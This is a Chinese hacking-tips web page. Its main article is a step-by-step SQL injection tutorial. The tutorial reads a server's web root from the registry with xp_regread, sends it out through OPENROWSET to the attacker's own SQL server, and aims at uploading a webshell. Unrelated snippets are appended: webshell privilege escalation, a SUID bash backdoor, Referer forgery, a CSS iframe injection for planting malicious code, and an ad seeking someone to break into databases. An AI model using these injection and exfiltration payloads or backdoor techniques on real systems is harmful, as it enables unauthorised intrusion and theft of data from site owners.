渗透中用openrowset搞shell的方法_安全相关

渗透中用openrowset搞shell的方法 
得到SQL注入点,首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,发现屏蔽了SQL错误信息,得不到物理路径,那还写个PP马了.
联想到一个权限不是很高的命令openrowset,进行跨库服务器查询,就是把一个SQL命令发送到远程数据库,然后看返回的结果,但是要启动事件跟踪!我们可以把网站信息写入数据库,然后%$^%$@#$@^%$~
首先在自己机器建立SQL数据库 

然后在对方机器上建立个表 create table [dbo].[fenggou]([cha8][char](255))--

在对方执行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密码'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

这样fenggou这个表里就会有这样一条记录select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用说,''D:\WEB"就是从注册表里读出的物理路径拉.然后执行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于执行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密码', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,这时你在你机器上SQL事件追踪器上就会显示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路径到手了 写小马传大马吧~ 

时间: 2024-11-08 20:42:27

渗透中用openrowset搞shell的方法_安全相关的相关文章

超全的webshell权限提升方法_安全相关

WEBSHELL权限提升技巧  c: d: e:.....  C:\Documents and Settings\All Users\「开始」菜单\程序\  看这里能不能跳转,我们从这里可以获取好多有用的信息比如Serv-U的路径,  C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\  看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,破解得到pcAnywhere密码,登陆  c:\Pr

超初级的linux后门制作方法_安全相关

   众所周知,Linux的文件权限如: 777:666等,其实只要在相应的文件上加上UID的权限,就可以用到加权限人的身份去运行这个文件.所以我们只需要将bash复制出来到另一个地方,然后用root加上UID权限,只要用户运行此Shell就可以用用root的身份来执行任何文件了 一个文件都有一个所有者, 表示该文件是谁创建的. 同时, 该文件还有一个组编号, 表示该文件所属的组, 一般为文件所有者所属的组. 如果是一个可执行文件, 那么在执行时, 一般该文件只拥有调用该文件的用户具有的权限.

ASP,PHP与.NET伪造HTTP-REFERER方法及防止伪造REFERER的方法_安全相关

 HTTP-REFERER这个变量已经越来越不可靠了,完全就是可以伪造出来的东东. 以下是伪造方法: ASP/Visual Basic代码 dim http      set http=server.createobject("MSXML2.XMLHTTP") '//MSXML2.serverXMLHTTP也可以     Http.open "GET",url,false      Http.setRequestHeader "Referer",

QQ聊天记录删除了怎么恢复简单方法_安全相关

现在朋友之间交流,基本是都是通过QQ聊天,如果你一不小心把重要的聊天记录删除了该怎么办呢?下面小编就教你一些小窍门,保证解决你的难题. 第一种:向朋友请求帮助 相信我们大家都知道QQ聊天记录会在双方的电脑上保留着, 你电脑上的删除了,对方的电脑上可能还保留着.所以假如你和某个朋友聊天记录一不小心被删除了,你可以向你的朋友请求帮助,登陆QQ,找到你那个朋友让他把聊天记录导出一份给你.相信这是最为快速方便的一种方法了. 第二种:利用文件夹 如果对方也把QQ聊天记录删除了,又该怎么办呢?那我们就利用第

IRC后门病毒及手动清除方法_安全相关

   2004年年初,IRC后门病毒开始在全球网络大规模出现.一方面有潜在的泄漏本地信息的危险,另一方面病毒出现在局域网中使网络阻塞,影响正常工作,从而造成损失.  同时,由于病毒的源代码是公开的,任何人拿到源码后稍加修改就可编译生成一个全新的病毒,再加上不同的壳,造成IRC后门病毒变种大量涌现.还有一些病毒每次运行后都会进行变形,给病毒查杀带来很大困难.本文先从技术角度介绍IRC后门病毒,然后介绍其手工清除方法.  一.技术报告  IRC病毒集黑客.蠕虫.后门功能于一体,通过局域网共享目录和系

黑客破解口令常用的三种方法_安全相关

   通过破解获得系统管理员口令,进而掌握服务器的控制权,是黑客的一个重要手段.破解获得管理员口令的方法有很多,下面是三种最为常见的方法.  (1)猜解简单口令:很多人使用自己或家人的生日.电话号码.房间号码.简单数字或者身份证号码中的几位:也有的人使用自己.孩子.配偶或宠物的名字:还有的系统管理员使用"password",甚至不设密码,这样黑客可以很容易通过猜想得到密码.  (2)字典攻击:如果猜解简单口令攻击失败后,黑客开始试图字典攻击,即利用程序尝试字典中的单词的每种可能.字典攻

真正能用,还有点效果的CSS挂马代码的方法_安全相关

网上流行的: body {  background-image: url('javascript:document.write("<Iframe src=http://192.168.0.5/test.htm width=0 height=0></iframe>")') } //此方法会使主页不正常.返回一片空白. 用弹窗. body {  background-image: url('javascript:open("http://192.168.0

php调用shell的方法_php实例

本文实例讲述了php调用shell的方法,分享给大家供大家参考.具体方法如下: 一.配置 查看php.ini中配置是否打开安全模式,主要是以下三个地方 safe_mode =  (这个如果为off下面两个就不用管了) disable_functions = safe_mode_exec_dir= 二.使用 由于PHP基本是用于WEB程序开发的,所以安全性成了人们考虑的一个重要方面.于是PHP的设计者们给PHP加了一个门:安全模式.如果运行在安全模式下,那么PHP脚本中将受到如下四个方面的限制:

sql-求解答{悬赏}如何渗透检测漏洞获取shell加固数据库技术

问题描述 求解答{悬赏}如何渗透检测漏洞获取shell加固数据库技术 求解答{悬赏}如何渗透检测漏洞获取shell加固数据库技术 寻求专业人士安全评估渗透测试shell获取.下载某数据库加固.漏洞检测修补.应急响应等: 熟练掌握内网渗透的相关知识,熟悉各种内网入侵/渗透技术. 熟悉黑客常用的攻击技术.手法和相应防范措施,精通WEB安全攻击和防范方法. 能做请+扣扣3008~4332在线等侯